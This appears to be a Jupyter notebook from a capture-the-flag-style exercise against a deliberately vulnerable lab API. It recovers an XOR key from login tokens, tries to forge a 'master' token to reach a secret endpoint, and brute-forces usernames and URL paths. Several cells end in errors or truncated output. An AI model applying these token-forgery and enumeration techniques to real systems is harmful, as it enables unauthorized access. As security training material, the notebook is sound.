In [1]:
import requests
import json
import numpy as np
from random import randint

In [2]:
headers = {'Content-Length': '156', 'Content-Type': 'application/problem+json; charset=utf-8', 'Server': 'Microsoft-IIS/10.0', 'Strict-Transport-Security': 'max-age=2592000', 'X-Powered-By': 'ASP.NET', 'Set-Cookie': 'ARRAffinity=eacc2b1020a8e4d56209a60038160e358f9735b941f8073c1fc0b38a4fc6dc32;Path=/;HttpOnly;Domain=weak-system-lab.lacunasoftware.com', 'Date': 'Sat, 23 Nov 2019 19:48:01 GMT'}

In [3]:
base_url = "https://weak-system-lab.lacunasoftware.com/api/"

In [4]:
def gen_user():
    return {
        'username': 'g' + ''.join([str(randint(0, 9)) for _ in range(7) ]),
        'password': '12345678',
        'email': 'gabriel.lins97@gmail.com',
    }

In [5]:
def request_user_creation(user):
    return requests.post(url=base_url+"users/create", data=user, headers=headers)

In [6]:
def request_user_login(user):
    return requests.post(url=base_url+"users/login", data=user, headers=headers)

In [7]:
def auth_master(token):
    headers = json.dumps({'Authorization': 'Bearer ' + token})
    return requests.get(url=base_url+"secret", headers=headers)

In [17]:
requests.get(url=base_url+"secret",headers={'Authorization': 'Bearer '})

<Response [200]>

In [8]:
def get_user_token(username):
    user = gen_user()
    user['username'] = username
    user = json.dumps(user)
    print(request_user_creation(user).text)
    print(request_user_login(user).json())
    return request_user_login(user).json()['token']

In [9]:
user = gen_user()
request_user_creation(json.dumps(user)).text

'{"status":"Success"}'

In [10]:
token = request_user_login(json.dumps(user)).json()['token']
len(token)

172

In [15]:
a = np.zeros(172)
for _ in range(100):
    a += np.array([int(a, 16) for a in get_user_token('1' * 32)])
    a -= np.array([int(a, 16) for a in get_user_token('1' * 32)])
mask = a == np.zeros(172)

01D23F44B57275C58EE5E5E814B01648F42553E2577E52089FD11CDA5ACFE91A65BC36757E6A7', 'status': 'Success'}
{"message":"Error: User 11111111111111111111111111111111 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8BB532817544B449A6D17DCC4B55129CCFC729DA23DD4B0BD4E09EFB2AFFCDAE791494EDCC5B8E5281762A70913A6E536918CB7921896E34748F42553E2577E52089FD11CDA5ACFE90A454C46256E0AF', 'status': 'Success'}
{"message":"Error: User 11111111111111111111111111111111 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8BB532817544B449A6D17DCC4B55129CCFC729DA23DD4B0BD4E09EFB2AFFCDAE791494B19F76D312843F6A6B91084A274D69DA4144935902528F42553E2577E52089FD11CDA5ACFE90AC55C46852E6A6', 'status': 'Success'}
{"message":"Error: User 11111111111111111111111111111111 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8BB532817544B449A6D17DCC4B55129CCFC729DA23DD4B0BD4E09EFB2AFFCDAE791494E9BA61C610BD412131F43278465947E76A0BAE7927648F42553E2577E52089FD11CDA5ACFE93A254CF6352E2A8', 'status': 'Success'}
{"messag

In [17]:
mask

array([ True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True,  True,  True,  True,  True,  True,  True,  True,  True,
        True, False, False, False, False, False, False, False, False,
       False, False, False, False, False, False, False, False, False,
       False, False, False, False, False, False, False, False, False,
       False, False, False, False, False, False, False, False, False,
       False, False, False, False, False, False, False, False, False,
        True,  True,

In [51]:
for i in range(32):
    a = np.zeros(172)
    string = ''
    for j in range(32):
        string += ('0' if i != j else 'H')
    a += np.array([int(a, 16) for a in get_user_token(string)])
    a -= np.array([int(a, 16) for a in get_user_token('0' * 32)])
    user[i] = a == np.zeros(172)
    user[i] = ~user[i] & mask

{"status":"Success"}
{'token': 'F11D8C3559DAF2B433807445B548A7D07CCD4A54139DCEC628DB22DC4A0AD5E19FFA2BFECCAF791494AC8407C5549840146A914F6E42731B9278268C5917648F42553E2577E52089FD11CDA6A8FE95A150C06958E7AB', 'status': 'Success'}
{"message":"Error: User 00000000000000000000000000000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548A7D07CCD4A54139DCEC628DB22DC4A0AD5E19FFA2BFECCAF791494B7A979D54BB67D1740811C7E7A5279D75C3AFC5315748F42553E2577E52089FD11CDA6A8FE94A75AC76758E4AD', 'status': 'Success'}
{"status":"Success"}
{'token': 'F11D8C3559DA8ACC33807445B548A7D07CCD4A54139DCEC628DB22DC4A0AD5E19FFA2BFECCAF7914948DCC76F615854F1039F452795D605EE73D47AC1708748F42553E2577E52089FD11CDA6A8FE97A656C46059E3A7', 'status': 'Success'}
{"message":"Error: User 00000000000000000000000000000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548A7D07CCD4A54139DCEC628DB22DC4A0AD5E19FFA2BFECCAF7914949DB06BDF40AD686B71F44B78676B4FD83A3EBA6851748F42553E2577E52089FD

In [52]:
user

, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False]),
 18: array([False, False, False, False, False, False, False, False, False,
        False, False, False, False, False, False, False, False, False,
        False, False, False, Fals

In [53]:
user_map = np.zeros(32)
for i in range(32):
    user_map[i] = np.argmax(user[i])
user_map

array([12., 14., 16., 18., 20., 22., 24., 26., 28., 30., 32., 34., 36.,
       38., 40., 42., 44., 46., 48., 50., 52., 54., 56., 58., 60., 62.,
       64., 66., 68., 70., 72., 74.])

In [54]:
a = np.array([int(a, 16) for a in get_user_token('0' * 32)])
key = a[user_map.astype(np.int)]
key

{"message":"Error: User 00000000000000000000000000000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548A7D07CCD4A54139DCEC628DB22DC4A0AD5E19FFA2BFECCAF791494B2AC54C41081693364913E5443604EEB220890511C528F42553E2577E52089FD11CDA6AAF790A652C76453E0AB', 'status': 'Success'}


array([ 8, 11,  3,  8,  7,  4, 11,  4, 10, 13,  7, 12,  4,  5,  1,  9, 12,
       12,  2, 13,  2, 13,  4,  0, 13, 14,  9, 15,  2, 15, 12, 10])

In [56]:
a = np.array([int(a, 32) for a in get_user_token('00000000')])
decode = np.bitwise_xor(a[user_map.astype(np.int)],key)
decode

{"message":"Error: User 00000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548B4C36FDE5947008EDDD53BC831CF5919C6F28CE938EDDFBC791494938441860DC45E1D4C913A537C1E44DB6125A57D5D648F42553E2577E52089FD11CDA6AAF296AC5BC36352E7AF', 'status': 'Success'}


array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
       1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)

In [57]:
a = np.array([int(a, 16) for a in get_user_token('0' * 8)])
parser = np.bitwise_xor(a[user_map.astype(np.int)],key)
parser

{"message":"Error: User 00000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548B4C36FDE5947008EDDD53BC831CF5919C6F28CE938EDDFBC791494EB984DFA5386733867F4105470455BCC4C13AB0D0E748F42553E2577E52089FD11CDA6AAFF93A554C06857E0AF', 'status': 'Success'}


array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
       1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)

In [11]:
for i in range(255):
    try:
        token = get_user_token('master{}{}'.format(chr(i),chr(i)))
        print(' ')
        print(auth_master(token).text)
        print(' ')
    except:
        print('error')

94E6924FD04D90402879913A2B224F5CEF7305A10B16528F42553E2577E52089FD11CDA9A9F597AC5AC16153E6AF', 'status': 'Success'}
 
{"message":"Request without Header Authorization token","status":"Fail"}
 
{"message":"Error: User masteruu already exists","status":"Fail"}
{'token': 'F11D8C3559DAD7E570C42107F00DB4C36FDE5947008EDDD53BC831CF5919C6F28CE938EDDFBC7914948E936DFF109B712549F4147B5F464BD6670881773F648F42553E2577E52089FD11CDA9A9F591A45BC16152EBA8', 'status': 'Success'}
 
{"message":"Request without Header Authorization token","status":"Fail"}
 
{"message":"Error: User mastervv already exists","status":"Fail"}
{'token': 'F11D8C3559DAD7E570C42107F30EB4C36FDE5947008EDDD53BC831CF5919C6F28CE938EDDFBC791494B4CC6EFE68C149286291182E7F6E78CE7F46BE6A2E528F42553E2577E52089FD11CDA9A9F590A753C36254E2AD', 'status': 'Success'}
 
{"message":"Request without Header Authorization token","status":"Fail"}
 
{"message":"Error: User masterww already exists","status":"Fail"}
{'token': 'F11D8C3559DAD7E570C42107F20FB4

In [49]:
token = np.array([int(a, 16) for a in get_user_token('0' * 8)])
token[user_map.astype(np.int)[:6]] = np.bitwise_xor(np.array([int(a,base=16) for a in 'master']),key[:6])
token 

{"message":"Error: User 00000000 already exists","status":"Fail"}
{'token': 'F11D8C3559DA8AB433807445B548B4C36FDE5947008EDDD53BC831CF5919C6F28CE938EDDFBC791494B3B65CF50DAD407D5DF42E675D4D5FC761348C6D33748F42553E2577E52089FD11CDA3A9F59CA552C16655E7AC', 'status': 'Success'}


ValueError: invalid literal for int() with base 16: 'm'

In [3]:
for i in range(256):
    try:
        padding = '{}{}'.format(chr(i),chr(i))
        token = np.array([int(a, 16) for a in get_user_token('master'+padding)])
        print(token)
        print(token.tobytes())
        auth_master('a')
    except:
        print('oi')

oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi
oi


In [4]:
    for i in range(256):
    print(chr(i))

IndentationError: expected an indented block (<ipython-input-4-3539fe5a8a2d>, line 2)

In [13]:
import json
# headers = {'Content-Length': '183', 'Content-Type': 'application/json; charset=utf-8', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'Server': 'Microsoft-IIS/10.0', 'Strict-Transport-Security': 'max-age=2592000', 'X-Powered-By': 'ASP.NET', 'Set-Cookie': 'ARRAffinity=eacc2b1020a8e4d56209a60038160e358f9735b941f8073c1fc0b38a4fc6dc32;Path=/;HttpOnly;Domain=weak-system-lab.lacunasoftware.com', 'Date': 'Sat, 23 Nov 2019 12:49:44 GMT'}
headers = {}
def get_response(api, data={}):
    if data == {}:
        data = get_user_data()
    data = json.dumps(data)
    
    return requests.get("https://weak-system-lab.lacunasoftware.com/" + api)

In [14]:
auth_master(token)

<Response [404]>

In [15]:
def check_url(url):
    try:
        return checked[url]
    except:
        r = get_response(url)
        checked[url] = r.status_code
        if checked[url] != 404:
            print(url + ' passed')
        return checked[url]

In [16]:
apis = [
    'system',
    'api',
    'login',
    'register',
    'access',
    'secret',
    'update',
    'common', 
    'app',
    'users',
    'bin',
    'auth',
    'authentication',
    'create',
    'new',
    'dev',
    'password',
    'simple',
]
for api1 in apis:
    url = api1
    check_url(url)
    for api2 in apis:
        url = api1 + '/' + api2
        check_url(url)

NameError: name 'get_user_data' is not defined

In [0]:
for url in checked:
    if checked[url] != 404:
        print(url + ' passed: ' + str(checked[url]))
        print(get_response(url).text)

In [0]:
get_response('api/secret').text

In [0]:
requests.post("http://weak-system-lab.lacunasoftware.com/").status_code